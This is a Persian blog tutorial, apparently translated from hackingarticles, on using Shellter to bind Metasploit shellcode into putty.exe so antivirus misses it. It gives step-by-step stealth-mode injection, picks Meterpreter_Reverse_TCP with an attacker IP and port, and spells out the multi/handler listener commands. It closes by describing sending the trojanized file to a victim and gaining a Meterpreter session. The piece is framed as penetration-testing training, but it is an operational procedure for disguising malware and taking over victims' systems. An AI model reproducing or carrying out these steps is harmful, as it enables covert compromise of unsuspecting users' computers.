دور زدن آنتی ویروس با Shellter

زمان مطالعه: 4 دقیقه
دور زدن آنتی ویروس با Shellter

آنچه در این مقاله می‌خوانید

در این مقاله قصد داریم تا شما را با نحوه دور زدن آنتی ویروس با Shellter آشنا کنیم ابزار Shellter ابزاری است که با استفاده از آن می توان یک Payload را ایجاد کرده و سپس با استفاده از روش هایی که در Shellter وجود دارد می توان آنتی ویروس را بای پس کرد.

Shellter چیست؟

Shellter یک ابزار داینامیک درج یا الحاق Shellcode و ابزار هک آنتی ویروس است؛ که به‌طور مؤثر یک shellcode را مجدداً encode می‌کند تا نرم‌افزار آنتی‌ویروس (AV) را دور بزند. Shellter ثابت کرده  که اولین آلوده‌کننده داینامیک برای فرمت فایل PE یا (Portable Executable) برنامه‌های  ۳۲ بیتی ویندوز است ما از ابزار shellter برای هک آنتی ویروس استفاده می‌کنیم.

برای استفاده از هک آنتی ویروس Shellter می‌توانید shellcode خود را ا با استفاده از  Metasploit ایجاد کنید. Shellter یک برنامه  ۳۲ بیتی ویندوزی و shellcode را به‌گونه‌ای تعبیه می‌کند که توسط نرم‌افزار AV شناسایی نمی‌شود.

نصب ابزار Shellter

نحوه نصب آن در کالی به‌صورت زیر است.

هک آنتی ویروس با shellterنرم‌افزار wine32 را هم به شکل زیر دانلود و نصب کنید.

نرم‌افزار wine32

شروع کار با ابزار هک آنتی ویروس  Shellter

بعد از باز کردن Shellter با استفاده ازwine  از شما می‌خواهد حالت موردنظر را انتخاب کنید.

شروع هک آنتی ویروس با shellterگزینه “a” را انتخاب کنید.

حالا باید یک فایل اجرایی را انتخاب کرده و در پوشه Shellter کپی کنید. این کار برای اتصال Shellter با یک فایل exe ضروری است. در اینجا ما فایل putty.exe را در پوشه Shellter کپی کرده و آن را به فایل نرم‌افزار Shellter پیوند می‌دهیم. زمانی که از PE Target خواسته شد، دستور زیر را تایپ کنید:

نحوه کار با Shellterعملیات bind کردن شروع می‌شود.

عملیات bind کردن برای دورزدن آنتی ویروس

برای ادامه کلید Enter را فشار دهید. ممکن است ببینید فایل DisASM.dll با موفقیت ایجاد شده است. حالت مخفی کردن را فعال کنید. سپس، از شما خواسته می‌شود که حالت مخفی‌کاری را فعال کنید، “y” را برای تائید وارد کنید.

فعال کردن حالت مخفی کردن برای دور زدن آنتی ویروس

صفحه فهرستی از payloadها را نشان می‌دهد. از شما می‌پرسد که آیا می‌خواهید از payloadهای فهرست شده استفاده کنید یا سفارشی. برای استفاده از payloadهای فهرست شده، “L” را تایپ کنید. سپس، از شما می‌خواهد که شماره payload موردنظر را از فهرست انتخاب کنید. شما می‌توانید شماره موردنظر خود را انتخاب کنید. در این مورد  ما ۱ را برای Meterpreter_Reverse_TCP انتخاب کرده‌ایم.

choose_payload برای دور زدن آنتی ویروس ویندوز

سپس از شما خواسته می‌شود که LHOST و LPORT را تنظیم کنید. لوکال هاست و لوکال پورتی را که می‌خواهید session را روی آن انجام دهید وارد کنید. در این مورد ما، LHOST 192.168.1.109 [Attacker IP] و LPORT را به‌عنوان ۴۴۴۴ تنظیم کرده‌ایم. وقتی کلید Enter را فشار دهید، اطلاعات payload نمایش داده می‌شود.

اجرا کردن اکسپلویت برای دور زدن آنتی ویروس

یک پیام هشدار ظاهر می‌شود و به‌محض اینکه injection تأیید شد، از شما خواسته می‌شود برای ادامه، کلید Enter را فشار دهید.

اجرا کردن Listenser در Msfconsole

در یک ترمینال جدید msfconsole را تایپ کنید تا  Metasploit framework راه‌اندازی شود و دستور زیر را اجرا کنید که یک listener است

  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • <set lhost <IP
  • <set lport <port-no
  • exploit

shellcode_putty برای دور زدن آنتی ویروس ها در ویندوز

فایل putty.exe را به سمت سیستم تارگت ارسال می‌کنیم. وقتی قربانی روی فایل putty.exe کلیک می‌کند که shellcode به آن bind شده قربانی به دام افتاده و ما یک meterpreter دریافت می‌کنیم.

shellcode_putty برای دور زدن آنتی ویروس ها در ویندوزmeterpreter session باز می‌شود و دسترسی سیستم قربانی در اختیار ما قرار می‌گیرد.

 

shellter_meterpreterاین مقاله از منبع hackingarticles ترجمه‌شده است.

امیدوارم از مقاله‌ی هک آنتی ویروس استفاده لازم را برده باشید. درصورتی‌که علاقه‌مند به مباحث تست نفوذ شبکه  هستید می‌توانید در دوره های  آکادمی تک وان ۲۴ شرکت کنید.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *